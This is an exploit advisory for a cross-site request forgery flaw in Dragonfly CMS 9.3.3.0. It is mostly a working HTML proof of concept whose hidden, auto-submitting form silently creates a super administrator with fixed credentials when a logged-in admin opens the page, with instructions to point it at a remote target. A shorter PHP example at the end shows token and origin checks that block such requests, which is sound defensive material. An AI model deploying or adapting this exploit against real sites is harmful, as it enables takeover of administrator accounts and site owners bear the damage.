Dragonfly CMS 9.3.3.0 Cross Site Request Forgery
Posted on 13 March 2012
=================================================================================================
Vulnerable Software: Dragonfly CMS v9.3.3.0
Downloaded and tested from: http://dragonflycms.org/Downloads/get=28/
Fileinfo: dragonflycms.org Dragonfly9.3.3.0.zip 2.25 MB 70aea682301253637844d7caa10c3ed0
=================================================================================================
Vuln Desc:
Dragonfly CMS v9.3.3.0 suffers from a CROSS SITE REQUEST FORGERY vulnerability.
Will Pwn: If a currently logged-in administrator visits a malicious LINK which contains the POC code (see below),
a new Super Admin will be created on the remote site with these credentials:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1

@Print Screen on Success Pwn: http://s019.radikal.ru/i635/1203/f1/03e535781d5f.png
=================================================================================================
/*
Tested on: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
    -> ;
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+

Successfully exploited.
*/

===================Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit=====================
<html>
<head>
<title>Dragonfly CMS v9.3.3.0 CSRF ADD SUPER ADMIN Proof Of Concept Exploit</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" autocomplete="off" action="http://CHANGE_TO_RTARGET/admin.php?op=admins&mode=add" enctype="multipart/form-data" accept-charset="utf-8">
<!-- User name -->
<input type="hidden" name="add_aid" id="add_aid" size="31" maxlength="30" value="MySecRet1"/>
<!-- Email Address -->
<input type="hidden" name="add_email" id="add_email" size="31" maxlength="60" value="MySecRet1@localhost.tld" />
<!-- checked (to create a super admin) -->
<input type="hidden" name="radminsuper" id="radminsuper" value="1" checked="checked" />
<!-- Password -->
<input type="hidden" name="add_pwd" id="add_pwd" size="20" maxlength="40" value="MySecRet1" />
</form>
</body>
<!--
On a successful Pwn, the following will be created:
Username: MySecRet1
Email: MySecRet1@localhost.tld
Password: MySecRet1
CTRL+F http://CHANGE_TO_RTARGET and change it to the remote target.
-->
</html>
===================================EOF==========================================================

/AkaStep ^_^

GreetZ to all: packetstormsecurity.*, securityfocus.com, security.nnov.ru

+--------------+
| Live         |
+--------------+
| 1331522784   |
+--------------+
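The PoC works because the admin-creation POST is accepted on the strength of the administrator's session cookie alone. The block below is an added example, not Dragonfly CMS code and not part of the original advisory: it shows a per-session token plus an Origin/Referer check guarding such a request. The function names, the `csrf_token` field and the hosts `cms.example` and `attacker.example` are hypothetical, and it assumes PHP 7+ with a session already started in real use.

```php
<?php
// Added example: hypothetical helpers, not Dragonfly CMS code. Requires PHP 7+.

// Issue one random token per session; embed it as a hidden field in every admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token matches the session's token (constant-time compare).
function csrf_token_valid($submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// True when Origin (or, failing that, Referer) names this site.
// A request with neither header is rejected here.
function same_origin(array $server, string $expectedHost): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Gate for state-changing admin requests such as op=admins&mode=add.
function guard_admin_post(array $server, array $post, string $expectedHost): bool
{
    return ($server['REQUEST_METHOD'] ?? '') === 'POST'
        && same_origin($server, $expectedHost)
        && csrf_token_valid($post['csrf_token'] ?? null);
}

// Constructed demonstration (run from the CLI); all values below are made up.
$_SESSION = [];
$token = csrf_token();
// Fields as sent by the auto-submitting form above: no token, foreign Origin.
$forged = ['add_aid' => 'MySecRet1', 'radminsuper' => '1'];
$forgedSrv = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://attacker.example'];
// Same fields submitted from the site's own admin form, which carries the token.
$legit = $forged + ['csrf_token' => $token];
$legitSrv = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://cms.example'];
var_dump(guard_admin_post($forgedSrv, $forged, 'cms.example'));
var_dump(guard_admin_post($legitSrv, $legit, 'cms.example'));
```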
